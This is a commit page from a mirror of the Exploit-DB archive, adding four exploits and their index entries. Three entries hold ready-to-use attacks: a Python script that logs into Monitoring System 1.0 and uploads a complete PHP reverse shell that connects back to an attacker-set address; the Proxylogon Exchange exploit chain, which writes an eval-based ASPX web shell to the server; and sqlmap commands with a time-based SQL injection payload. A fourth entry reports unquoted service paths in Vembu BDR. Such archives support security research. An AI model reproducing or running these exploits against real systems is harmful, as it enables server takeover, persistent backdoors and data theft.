bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2021-03-13

Browse source 
4 changes to exploits/shellcodes

Vembu BDR 4.2.0.1 U1 - Multiple Unquoted Service Paths
Microsoft Exchange 2019 - SSRF to Arbitrary File Write (Proxylogon)
Monitoring System (Dashboard) 1.0 - 'uname' SQL Injection
Monitoring System (Dashboard) 1.0 - File Upload RCE (Authenticated)
This commit is contained in:
Offensive Security 2021-03-13 05:01:58 +00:00
parent f348200ea1
commit edafbb9119
5 changed files with 541 additions and 0 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

41
exploits/php/webapps/49639.txt Normal file
View file

@ -0,0 +1,41 @@
# Exploit Title: Monitoring System (Dashboard) 1.0 - 'uname' SQL Injection
# Exploit Author: Richard Jones
# Date: 2021-01-26
# Vendor Homepage: https://www.sourcecodester.com/php/11741/monitoring-system-dashboard.html
# Software Link: https://www.sourcecodester.com/download-code?nid=11741&title=Monitoring+System+%28Dashboard%29+using+PHP+with+Source+Code
# Version: 1.0
# Tested On: Windows 10 Home 19041 (x64_86) + XAMPP 7.2.34
Steps.
1. Run sqlmap
"sqlmap -u "http://localhost/asistorage/login.php" --data="uname=a&upass=w&btnlogin=" --batch
2.
Parameter: uname (POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: uname=a' AND (SELECT 4539 FROM (SELECT(SLEEP(5)))zdoW) AND 'YWTS'='YWTS&upass=w&btnlogin=
Exploit paths:
Database:
sqlmap -u "http://localhost/asistorage/login.php" --data="uname=a&upass=w&btnlogin=" --batch --dbms=mysql --dbs
Tables:
sqlmap -u "http://localhost/asistorage/login.php" --data="uname=a&upass=w&btnlogin=" --batch --dbms=mysql -D asidatabase --tables
[11 tables]
+------------+
| accounts |
| attendance |
| contacts |
| employee |
| gallery |
| msexcel |
| msppt |
| msword |
| oic |
| random |
| sign |
+------------+

263
exploits/php/webapps/49640.py Executable file
View file

@ -0,0 +1,263 @@
# Exploit Title: Monitoring System (Dashboard) 1.0 - File Upload RCE (Authenticated)
# Exploit Author: Richard Jones
# Date: 2021-03-11
# Vendor Homepage: https://www.sourcecodester.com/php/11741/monitoring-system-dashboard.html
# Software Link: https://www.sourcecodester.com/download-code?nid=11741&title=Monitoring+System+%28Dashboard%29+using+PHP+with+Source+Code
# Version: 1.0
# Tested On: Windows 10 Home 19041 (x64_86) + XAMPP 7.2.34
# Usage.
# Change Target_IP, REV_IP, REV_PORT to your own
import requests
def main():
##### Change info here #####
TARGET_IP="127.0.0.1"
REV_IP="127.0.0.1"
REV_PORT=9999
############################
LOGIN="/asistorage/login.php"
MAILING_LIST="/asistorage/modules/random/index.php?view=add"
UPLOAD_URL="/asistorage/modules/random/upload.php"
VIEW_ITEM="/asistorage/modules/random/index.php"
CALL_URL="/asistorage/modules/random/uploads/"
s = requests.Session()
def phpshell():
return """
<?php
// Copyright (c) 2020 Ivan Å incek
// v1.1
// Requires PHP v5.0.0 or greater.
// Works on Linux OS, macOS and Windows OS.
// See the original script at https://github.com/pentestmonkey/php-reverse-shell.
header('Content-Type: text/plain; charset=UTF-8');
class Shell {
private $addr = null;
private $port = null;
private $os = null;
private $shell = null;
private $descriptorspec = array(
0 => array('pipe', 'r'), // shell can read from STDIN
1 => array('pipe', 'w'), // shell can write to STDOUT
2 => array('pipe', 'w') // shell can write to STDERR
);
private $options = array(); // proc_open() options
private $buffer = 1024; // read/write buffer size
private $clen = 0; // command length
private $error = false; // stream read/write error
public function __construct($addr, $port) {
$this->addr = $addr;
$this->port = $port;
if (stripos(PHP_OS, 'LINUX') !== false) { // same for macOS
$this->os = 'LINUX';
$this->shell = '/bin/sh';
} else if (stripos(PHP_OS, 'WIN32') !== false || stripos(PHP_OS, 'WINNT') !== false || stripos(PHP_OS, 'WINDOWS') !== false) {
$this->os = 'WINDOWS';
$this->shell = 'cmd.exe';
$this->options['bypass_shell'] = true; // we do not want a shell within a shell
} else {
echo "SYS_ERROR: Underlying operating system is not supported, script will now exit...\n";
exit(0);
}
}
private function daemonize() {
set_time_limit(0); // do not impose the script execution time limit
if (!function_exists('pcntl_fork')) {
echo "DAEMONIZE: pcntl_fork() does not exists, moving on...\n";
} else {
if (($pid = pcntl_fork()) < 0) {
echo "DAEMONIZE: Cannot fork off the parent process, moving on...\n";
} else if ($pid > 0) {
echo "DAEMONIZE: Child process forked off successfully, parent process will now exit...\n";
exit(0);
} else if (posix_setsid() < 0) { // once daemonized you will no longer see the script's dump
echo "DAEMONIZE: Forked off the parent process but cannot set a new SID, moving on as an orphan...\n";
} else {
echo "DAEMONIZE: Completed successfully!\n";
}
}
umask(0); // set the file/directory permissions - 666 for files and 777 for directories
}
private function read($stream, $name, $buffer) {
if (($data = @fread($stream, $buffer)) === false) { // suppress an error when reading from a closed blocking stream
$this->error = true; // set global error flag
echo "STRM_ERROR: Cannot read from ${name}, script will now exit...\n";
}
return $data;
}
private function write($stream, $name, $data) {
if (($bytes = @fwrite($stream, $data)) === false) { // suppress an error when writing to a closed blocking stream
$this->error = true; // set global error flag
echo "STRM_ERROR: Cannot write to ${name}, script will now exit...\n";
}
return $bytes;
}
// read/write method for non-blocking streams
private function rw($input, $output, $iname, $oname) {
while (($data = $this->read($input, $iname, $this->buffer)) && $this->write($output, $oname, $data)) {
echo $data; // script's dump
if ($this->os === 'WINDOWS' && $oname === 'STDIN') { $this->clen += strlen($data); } // calculate the command length
}
}
// read/write method for blocking streams (e.g. for STDOUT and STDERR on Windows OS)
// we must read the exact byte length from a stream and not a single byte more
private function brw($input, $output, $iname, $oname) {
$size = fstat($input)['size'];
if ($this->os === 'WINDOWS' && $iname === 'STDOUT' && $this->clen) { // for some reason Windows OS pipes STDIN into STDOUT
$size -= $this->offset($input, $iname, $this->clen); // we do not like that
$this->clen = 0;
}
$fragments = ceil($size / $this->buffer); // number of fragments to read
$remainder = $size % $this->buffer; // size of the last fragment if it is less than the buffer size
while ($fragments && ($data = $this->read($input, $iname, $remainder && $fragments-- == 1 ? $remainder : $this->buffer)) && $this->write($output, $oname, $data)) {
echo $data; // script's dump
}
}
private function offset($stream, $name, $offset) {
$total = $offset;
while ($offset > 0 && $this->read($stream, $name, $offset >= $this->buffer ? $this->buffer : $offset)) { // discard the data from a stream
$offset -= $this->buffer;
}
return $offset > 0 ? $total - $offset : $total;
}
public function run() {
$this->daemonize();
// ----- SOCKET BEGIN -----
$socket = @fsockopen($this->addr, $this->port, $errno, $errstr, 30);
if (!$socket) {
echo "SOC_ERROR: {$errno}: {$errstr}\n";
} else {
stream_set_blocking($socket, false); // set the socket stream to non-blocking mode | returns 'true' on Windows OS
// ----- SHELL BEGIN -----
$process = proc_open($this->shell, $this->descriptorspec, $pipes, '/', null, $this->options);
if (!$process) {
echo "PROC_ERROR: Cannot start the shell\n";
} else {
foreach ($pipes as $pipe) {
stream_set_blocking($pipe, false); // set the shell streams to non-blocking mode | returns 'false' on Windows OS
}
// ----- WORK BEGIN -----
fwrite($socket, "SOCKET: Shell has connected! PID: " . proc_get_status($process)['pid'] . "\n");
while (!$this->error) {
if (feof($socket)) { // check for end-of-file on SOCKET
echo "SOC_ERROR: Shell connection has been terminated\n"; break;
} else if (feof($pipes[1]) || !proc_get_status($process)['running']) { // check for end-of-file on STDOUT or if process is still running
echo "PROC_ERROR: Shell process has been terminated\n"; break; // feof() does not work with blocking streams
} // use proc_get_status() instead
$streams = array(
'read' => array($socket, $pipes[1], $pipes[2]), // SOCKET | STDOUT | STDERR
'write' => null,
'except' => null
);
$num_changed_streams = stream_select($streams['read'], $streams['write'], $streams['except'], null); // wait for stream changes | will not wait on Windows OS
if ($num_changed_streams === false) {
echo "STRM_ERROR: stream_select() failed\n"; break;
} else if ($num_changed_streams > 0) {
if ($this->os === 'LINUX') {
if (in_array($socket , $streams['read'])) { $this->rw($socket , $pipes[0], 'SOCKET', 'STDIN' ); } // read from SOCKET and write to STDIN
if (in_array($pipes[2], $streams['read'])) { $this->rw($pipes[2], $socket , 'STDERR', 'SOCKET'); } // read from STDERR and write to SOCKET
if (in_array($pipes[1], $streams['read'])) { $this->rw($pipes[1], $socket , 'STDOUT', 'SOCKET'); } // read from STDOUT and write to SOCKET
} else if ($this->os === 'WINDOWS') {
// order is important
if (in_array($socket, $streams['read'])) { $this->rw ($socket , $pipes[0], 'SOCKET', 'STDIN' ); } // read from SOCKET and write to STDIN
if (fstat($pipes[2])['size']/*-------*/) { $this->brw($pipes[2], $socket , 'STDERR', 'SOCKET'); } // read from STDERR and write to SOCKET
if (fstat($pipes[1])['size']/*-------*/) { $this->brw($pipes[1], $socket , 'STDOUT', 'SOCKET'); } // read from STDOUT and write to SOCKET
}
}
}
// ------ WORK END ------
foreach ($pipes as $pipe) {
fclose($pipe);
}
proc_close($process);
}
// ------ SHELL END ------
fclose($socket);
}
// ------ SOCKET END ------
}
}
// change the host address and/or port number as necessary
$reverse_shell = new Shell('OLDIP', OLDPORT);
$reverse_shell->Run();
?>"""
def login(url,username, password):
try:
data = {
"uname":username,
"upass":password,
"btnlogin":""
}
r = s.post(url,data=data, verify=False)
page = r.text
if "Invalid Username or Password, please try again." in page:
return False
else:
return True
except :
return False
def uploadShell(url):
s.get(f"{url}{MAILING_LIST}") # Call page
fileData = {
'uploaded_file':("rev.php",str(phpshell().replace("OLDIP", REV_IP).replace("OLDPORT", str(REV_PORT))).encode(), "application/octet-stream")}
data={
"pname":"",
"pname":"a",
'cutoff':'',
'cutoff':'a',
'projectname':'',
'type':'a',
'projectname':'',
'dsend':'2029-03-19',
'desc':'a',
'MAX_FILE_SIZE':100000,
'Uploader':'',
}
up_url=f"{url}{UPLOAD_URL}"
r = s.post(up_url, files=fileData,data=data, verify=False)
if r.status_code == 200:
print("shell uploaded")
else:
print("Shell upload failed")
exit(0)
r = s.get(f"{url}{VIEW_ITEM}")
page = r.text
DL_URL=page.split("download.php?filename=")[1].split("\">")[0]
return DL_URL
#Login
base_url=f"http://{TARGET_IP}"
login_url=f"{base_url}{LOGIN}"
b=login(login_url, "jim", "jim")
if not b:
print("Login failed, Try again...")
exit(0)
#CAll shell
base=f"{base_url}"
CALL_URL_PART=uploadShell(base)
c_url=f"{base}{CALL_URL}{CALL_URL_PART}"
s.get(c_url)
#Shell can be found at http:/TARGET//asistorage/modules/random/uploads/
if __name__ == "__main__":
main()

57
exploits/windows/local/49641.txt Normal file
View file

@ -0,0 +1,57 @@
# Exploit Title: Vembu BDR 4.2.0.1 U1 - Multiple Unquoted Service Paths
# Date: 2020-11-6
# Exploit Author: Mohammed Alshehri
# Vendor Homepage: https://www.vembu.com/
# Software Link: https://sg-build-release.s3.amazonaws.com/BDRSuite/V420/4202020051312/Vembu_BDR_Backup_Server_Setup_4_2_0_1_U1_GA.exe
# Version: Version 4.2.0.1 U1
# Tested on: Microsoft Windows 10 Education - 10.0.17763 N/A Build 17763
# Service info:
C:\Users\m507>sc qc "hsflowd"
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: hsflowd
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files\Vembu\VembuBDR\..\VembuBDR360Agent\bin\hsflowd.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : Host_sFlow_Agent
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
C:\Users\m507>sc qc "VembuBDR360Agent"
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: VembuBDR360Agent
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files\Vembu\VembuBDR\..\VembuBDR360Agent\bin\VembuBDR360Agent.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : VembuBDR360Agent
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
C:\Users\m507>sc qc "VembuOffice365Agent"
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: VembuOffice365Agent
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files\Vembu\VembuBDR\..\VembuOffice365Agent\bin\VembuOffice365Agent.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : VembuOffice365Agent
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
C:\Users\m507>
# Exploit:
This vulnerability could permit executing code during startup or reboot with the escalated privileges.

176
exploits/windows/webapps/49637.py Executable file
View file

@ -0,0 +1,176 @@
# Exploit Title: Microsoft Exchange 2019 - SSRF to Arbitrary File Write (Proxylogon)
# Date: 2021-03-10
# Exploit Author: testanull
# Vendor Homepage: https://www.microsoft.com
# Version: MS Exchange Server 2013, 2016, 2019
# CVE: 2021-26855, 2021-27065
import requests
from urllib3.exceptions import InsecureRequestWarning
import random
import string
import sys
def id_generator(size=6, chars=string.ascii_lowercase + string.digits):
return ''.join(random.choice(chars) for _ in range(size))
if len(sys.argv) < 2:
print("Usage: python PoC.py <target> <email>")
print("Example: python PoC.py mail.evil.corp haxor@evil.corp")
exit()
requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)
target = sys.argv[1]
email = sys.argv[2]
random_name = id_generator(3) + ".js"
user_agent = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36"
shell_path = "Program Files\\Microsoft\\Exchange Server\\V15\\FrontEnd\\HttpProxy\\owa\\auth\\ahihi.aspx"
shell_absolute_path = "\\\\127.0.0.1\\c$\\%s" % shell_path
shell_content = '<script language="JScript" runat="server"> function Page_Load(){/**/eval(Request["exec_code"],"unsafe");}</script>'
legacyDnPatchByte = "68747470733a2f2f696d6775722e636f6d2f612f7a54646e5378670a0a0a0a0a0a0a0a"
autoDiscoverBody = """<Autodiscover xmlns="http://schemas.microsoft.com/exchange/autodiscover/outlook/requestschema/2006">
<Request>
<EMailAddress>%s</EMailAddress> <AcceptableResponseSchema>http://schemas.microsoft.com/exchange/autodiscover/outlook/responseschema/2006a</AcceptableResponseSchema>
</Request>
</Autodiscover>
""" % email
print("Attacking target " + target)
print("=============================")
print(legacyDnPatchByte.decode('hex'))
FQDN = "EXCHANGE"
ct = requests.get("https://%s/ecp/%s" % (target, random_name), headers={"Cookie": "X-BEResource=localhost~1942062522",
"User-Agent": user_agent},
verify=False)
if "X-CalculatedBETarget" in ct.headers and "X-FEServer" in ct.headers:
FQDN = ct.headers["X-FEServer"]
ct = requests.post("https://%s/ecp/%s" % (target, random_name), headers={
"Cookie": "X-BEResource=%s/autodiscover/autodiscover.xml?a=~1942062522;" % FQDN,
"Content-Type": "text/xml",
"User-Agent": user_agent},
data=autoDiscoverBody,
verify=False
)
if ct.status_code != 200:
print("Autodiscover Error!")
exit()
if "<LegacyDN>" not in ct.content:
print("Can not get LegacyDN!")
exit()
legacyDn = ct.content.split("<LegacyDN>")[1].split("</LegacyDN>")[0]
print("Got DN: " + legacyDn)
mapi_body = legacyDn + "\x00\x00\x00\x00\x00\xe4\x04\x00\x00\x09\x04\x00\x00\x09\x04\x00\x00\x00\x00\x00\x00"
ct = requests.post("https://%s/ecp/%s" % (target, random_name), headers={
"Cookie": "X-BEResource=Admin@%s:444/mapi/emsmdb?MailboxId=f26bc937-b7b3-4402-b890-96c46713e5d5@exchange.lab&a=~1942062522;" % FQDN,
"Content-Type": "application/mapi-http",
"User-Agent": user_agent
},
data=mapi_body,
verify=False
)
if ct.status_code != 200 or "act as owner of a UserMailbox" not in ct.content:
print("Mapi Error!")
exit()
sid = ct.content.split("with SID ")[1].split(" and MasterAccountSid")[0]
print("Got SID: " + sid)
proxyLogon_request = """<r at="Negotiate" ln="john"><s>%s</s><s a="7" t="1">S-1-1-0</s><s a="7" t="1">S-1-5-2</s><s a="7" t="1">S-1-5-11</s><s a="7" t="1">S-1-5-15</s><s a="3221225479" t="1">S-1-5-5-0-6948923</s></r>
""" % sid
ct = requests.post("https://%s/ecp/%s" % (target, random_name), headers={
"Cookie": "X-BEResource=Admin@%s:444/ecp/proxyLogon.ecp?a=~1942062522;" % FQDN,
"Content-Type": "text/xml",
"User-Agent": user_agent
},
data=proxyLogon_request,
verify=False
)
if ct.status_code != 241 or not "set-cookie" in ct.headers:
print("Proxylogon Error!")
exit()
sess_id = ct.headers['set-cookie'].split("ASP.NET_SessionId=")[1].split(";")[0]
msExchEcpCanary = ct.headers['set-cookie'].split("msExchEcpCanary=")[1].split(";")[0]
print("Got session id: " + sess_id)
print("Got canary: " + msExchEcpCanary)
ct = requests.get("https://%s/ecp/%s" % (target, random_name), headers={
"Cookie": "X-BEResource=Admin@%s:444/ecp/about.aspx?a=~1942062522; ASP.NET_SessionId=%s; msExchEcpCanary=%s" % (
FQDN, sess_id, msExchEcpCanary),
"User-Agent": user_agent
},
verify=False
)
if ct.status_code != 200:
print("Wrong canary!")
print("Sometime we can skip this ...")
rbacRole = ct.content.split("RBAC roles:</span> <span class='diagTxt'>")[1].split("</span>")[0]
# print "Got rbacRole: "+ rbacRole
print("=========== It means good to go!!!====")
ct = requests.post("https://%s/ecp/%s" % (target, random_name), headers={
"Cookie": "X-BEResource=Admin@%s:444/ecp/DDI/DDIService.svc/GetObject?schema=OABVirtualDirectory&msExchEcpCanary=%s&a=~1942062522; ASP.NET_SessionId=%s; msExchEcpCanary=%s" % (
FQDN, msExchEcpCanary, sess_id, msExchEcpCanary),
"Content-Type": "application/json; charset=utf-8",
"User-Agent": user_agent
},
json={"filter": {
"Parameters": {"__type": "JsonDictionaryOfanyType:#Microsoft.Exchange.Management.ControlPanel",
"SelectedView": "", "SelectedVDirType": "All"}}, "sort": {}},
verify=False
)
if ct.status_code != 200:
print("GetOAB Error!")
exit()
oabId = ct.content.split('"RawIdentity":"')[1].split('"')[0]
print("Got OAB id: " + oabId)
oab_json = {"identity": {"__type": "Identity:ECP", "DisplayName": "OAB (Default Web Site)", "RawIdentity": oabId},
"properties": {
"Parameters": {"__type": "JsonDictionaryOfanyType:#Microsoft.Exchange.Management.ControlPanel",
"ExternalUrl": "http://ffff/#%s" % shell_content}}}
ct = requests.post("https://%s/ecp/%s" % (target, random_name), headers={
"Cookie": "X-BEResource=Admin@%s:444/ecp/DDI/DDIService.svc/SetObject?schema=OABVirtualDirectory&msExchEcpCanary=%s&a=~1942062522; ASP.NET_SessionId=%s; msExchEcpCanary=%s" % (
FQDN, msExchEcpCanary, sess_id, msExchEcpCanary),
"Content-Type": "application/json; charset=utf-8",
"User-Agent": user_agent
},
json=oab_json,
verify=False
)
if ct.status_code != 200:
print("Set external url Error!")
exit()
reset_oab_body = {"identity": {"__type": "Identity:ECP", "DisplayName": "OAB (Default Web Site)", "RawIdentity": oabId},
"properties": {
"Parameters": {"__type": "JsonDictionaryOfanyType:#Microsoft.Exchange.Management.ControlPanel",
"FilePathName": shell_absolute_path}}}
ct = requests.post("https://%s/ecp/%s" % (target, random_name), headers={
"Cookie": "X-BEResource=Admin@%s:444/ecp/DDI/DDIService.svc/SetObject?schema=ResetOABVirtualDirectory&msExchEcpCanary=%s&a=~1942062522; ASP.NET_SessionId=%s; msExchEcpCanary=%s" % (
FQDN, msExchEcpCanary, sess_id, msExchEcpCanary),
"Content-Type": "application/json; charset=utf-8",
"User-Agent": user_agent
},
json=reset_oab_body,
verify=False
)
if ct.status_code != 200:
print("Write Shell Error!")
exit()
print("Successful!")

4
files_exploits.csv
View file

@ -11281,6 +11281,7 @@ id,file,description,date,author,type,platform,port
49630,exploits/windows/local/49630.txt,"FreeLAN 2.2 - 'FreeLAN Service' Unquoted Service Path",2021-03-09,"Mohammed Alshehri",local,windows,
49631,exploits/windows/local/49631.txt,"Sandboxie Plus v0.7.2 - 'SbieSvc' Unquoted Service Path",2021-03-09,"Mohammed Alshehri",local,windows,
49632,exploits/windows/local/49632.txt,"bVPN 2.5.1 - 'waselvpnserv' Unquoted Service Path",2021-03-09,"Mohammed Alshehri",local,windows,
49641,exploits/windows/local/49641.txt,"Vembu BDR 4.2.0.1 U1 - Multiple Unquoted Service Paths",2021-03-12,"Mohammed Alshehri",local,windows,
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@ -43823,3 +43824,6 @@ id,file,description,date,author,type,platform,port
49633,exploits/multiple/webapps/49633.py,"Atlassian JIRA 8.11.1 - User Enumeration",2021-03-10,"Dolev Farhi",webapps,multiple,
49634,exploits/hardware/webapps/49634.txt,"NuCom 11N Wireless Router 5.07.90 - Remote Privilege Escalation",2021-03-11,LiquidWorm,webapps,hardware,
49635,exploits/php/webapps/49635.txt,"MyBB OUGC Feedback Plugin 1.8.22 - Cross-Site Scripting",2021-03-11,0xB9,webapps,php,
49637,exploits/windows/webapps/49637.py,"Microsoft Exchange 2019 - SSRF to Arbitrary File Write (Proxylogon)",2021-03-11,testanull,webapps,windows,
49639,exploits/php/webapps/49639.txt,"Monitoring System (Dashboard) 1.0 - 'uname' SQL Injection",2021-03-12,"Richard Jones",webapps,php,
49640,exploits/php/webapps/49640.py,"Monitoring System (Dashboard) 1.0 - File Upload RCE (Authenticated)",2021-03-12,"Richard Jones",webapps,php,

Can't render this file because it is too large.